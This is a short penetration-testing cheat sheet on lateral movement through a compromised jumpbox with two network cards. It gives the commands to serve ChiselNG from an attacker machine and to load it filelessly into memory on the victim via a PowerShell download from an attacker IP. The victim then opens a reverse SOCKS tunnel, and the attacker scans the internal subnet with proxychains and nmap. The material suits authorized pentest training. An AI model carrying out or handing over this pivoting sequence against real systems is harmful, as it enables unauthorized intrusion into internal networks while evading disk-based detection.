Lateral Movement

ProxyChains SOCKS Tunnel

A victim machine could be a jumpbox with two NICs, such as 10.10.10.5 and 192.168.0.20. By leveraging Chisel (or ChiselNG in this case) and ProxyChains, we can target the 192.168.0.20/24 range through the compromised machine.

As a pre-requisite, ensure the ProxyChains config on the attacking machine, typically /etc/proxychains.conf, has proxy_dns commented out and the SOCKS5 address appropriately configured as socks5 127.0.0.1 1080. This will help prevent DNS leaks and proxy crashes.

# on attacking machine, serve the directory which contains ChiselNG.exe
kali@kali:~$ python -m http.server
# on attacking machine in another tab/window, setup reverse listener
kali@kali:~$ ./chiselng_amd64 server --reverse --port 9001

# victim machine, load ChiselNG into memory
user@victim > [System.Reflection.Assembly]::Load([System.Net.WebClient]::new().DownloadData('http://10.10.10.10:8000/ChiselNG.exe'))
# [ChiselNG]::Main('client <attacker_ip>:<tunnel_port> R:socks')
user@victim > [ChiselNG]::Main('client 10.10.10.10:9001 R:socks')

# on attacking machine, send commands through the jumpbox. Proxies can't handle ICMP or raw packets so those will need to be considered
# be as concise as possible to prevent timeouts and poor performance
kali@kali:~$ proxychains nmap -sSV -Pn -p- 192.168.0.2